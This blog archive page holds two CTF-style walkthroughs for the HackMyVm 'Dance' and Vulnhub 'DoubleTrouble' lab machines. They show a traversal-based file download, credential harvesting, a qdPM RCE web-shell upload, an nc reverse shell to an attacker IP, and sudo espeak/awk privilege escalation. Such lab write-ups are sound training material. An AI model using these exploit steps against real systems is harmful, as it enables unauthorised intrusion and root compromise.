日度归档:2021 年 9 月 14 日

HackMyVm Dance Walkthrough

发表评论

HackMyVm Dance Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Dance

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 ...
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 ...
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found /music.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 121]
 /music                (Status: 301) [Size: 169] [--> http://192.168.56.100/music/]

Enter /music in web browser, check information, it's a web app called musicco.

image-20210914101829803.png

Search exploit of musicco.

```bash
~ searchsploit musicco

Exploit Title | Path

Musicco 2.0.0 - Arbitrary Directory Download | php/webapps/45830.txt


Through the exploit, we can download the whole html dir as a zip file.

 ```bash
~ wget 'http://192.168.56.100/music/?getAlbum&parent=../../&album=var' -O var.zip

Unzip var.zip, check /music/config.php, get some credentials.

```bash
~ cat config.php
<?php
$_CONFIG['saveConfig'] = '';
$_CONFIG['users'] = array(
array('admin', 'admin', 'true'),
array('guest', 'guest', 'false'),
array('aria', 'seraphim', 'false'),
array('alice', 'rememberyou', 'false'),
array('ava', 'password', 'false'),
array('alba', 'thehostof', 'false'),
);
$_CONFIG['lang'] = 'en';
$_CONFIG['musicRoot'] = 'music';
$_CONFIG['coverFileName'] = 'folder';
$_CONFIG['coverExtension'] = '.png';
$_CONFIG['loadLyricsFromFile'] = 'on';
$_CONFIG['downLoadMissingCovers'] = 'on';
$_CONFIG['searchEngine'] = '';
$_CONFIG['imageSearchEngine'] = '';
?>


We can login ssh as user aria.

 ```bash
~ ssh aria@192.168.56.100
 aria@dance:~$ id
 uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Another user is alba, but it's nologin.

```bash
aria@dance:~$ cat /etc/passwd|grep alba
alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin


So we need to set the login shell for alba, then escalate to user alba.

```bash
 aria@dance:~$ su -s /bin/bash alba
 Password:
 alba@dance:/home/aria$ id
 uid=1001(alba) gid=1001(alba) groups=1001(alba)

Check sudo -l.

alba@dance:/home/aria$ sudo -l
 Matching Defaults entries for alba on dance:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User alba may run the following commands on dance:
     (root) NOPASSWD: /usr/bin/espeak

The last step is to use espeak to read (or listen to) /root/root.txt.

```bash
alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt -q -X
Translate 'rootflag'


 ...

Vulnhub DoubleTrouble Walkthrough

发表评论

Vulnhub DoubleTrouble Walkthrough

https://www.vulnhub.com/entry/doubletrouble-1,743/

Scan port 80.

~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
 403,404,500 --wildcard   -o 80.log
 ===============================================================
 /uploads              (Status: 301) [Size: 318] [--> http://192.168.56.100/uploads/]
 /images               (Status: 301) [Size: 317] [--> http://192.168.56.100/images/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /template             (Status: 301) [Size: 319] [--> http://192.168.56.100/template/]
 /core                 (Status: 301) [Size: 315] [--> http://192.168.56.100/core/]
 /install              (Status: 301) [Size: 318] [--> http://192.168.56.100/install/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
 /index.php            (Status: 200) [Size: 5814]
 /check.php            (Status: 200) [Size: 0]
 /sf                   (Status: 301) [Size: 313] [--> http://192.168.56.100/sf/]
 /readme.txt           (Status: 200) [Size: 470]
 /robots.txt           (Status: 200) [Size: 26]
 /secret               (Status: 301) [Size: 317] [--> http://192.168.56.100/secret/]

<!--more-->

In /secret, download doubletrouble.jpg, get password and creds.txt.

 ~ stegseek --crack -sf doubletrouble.jpg        
 StegSeek version 0.5
 Progress: 2.00% (2794835 bytes)
 [i] --> Found passphrase: "92camaro"
 [i] Original filename: "creds.txt"
 [i] Extracting to "doubletrouble.jpg.out"                    
 ~ mv doubletrouble.jpg.out creds.txt                
 ~ cat creds.txt                                                                                          otisrush@localhost.com
 otis666⏎

Search exploit of qdPM.

```bash
~ searchsploit qdPM

Exploit Title | Path

...
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py ... 


Use POC to upload backdoor.

 ```bash
~ python3 50175.py --host 'http://192.168.56.100/' -u otisrush@localhost.com -p otis666                                              python3-0 | 1 [14:53:09]

 You are not able to use the designated admin account because they do not have a myAccount page.

 Backdoor uploaded at - > http://192.168.56.100//uploads/users/?cmd=whoami

Check if backdoor works OK.

 ~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=whoami'
 <pre>www-data
 </pre>⏎

Get reverse shell.

```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash';
────────────────────────────────────────────────────────────────────────────────────────────────────────

~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:53330.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$


Check sudo -l.

```bash
 www-data@doubletrouble:/home$ ls -la
 ls -la
 total 8
 drwxr-xr-x  2 root root 4096 Sep 11 13:51 .
 drwxr-xr-x 18 root root 4096 Dec 17  2020 ..
 www-data@doubletrouble:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on doubletrouble:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on doubletrouble:
     (ALL : ALL) NOPASSWD: /usr/bin/awk

Get root.

www-data@doubletrouble:/home$ sudo awk 'BEGIN {system("/bin/sh")}'
 sudo awk 'BEGIN {system("/bin/sh")}'
 # id;hostname
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doubletrouble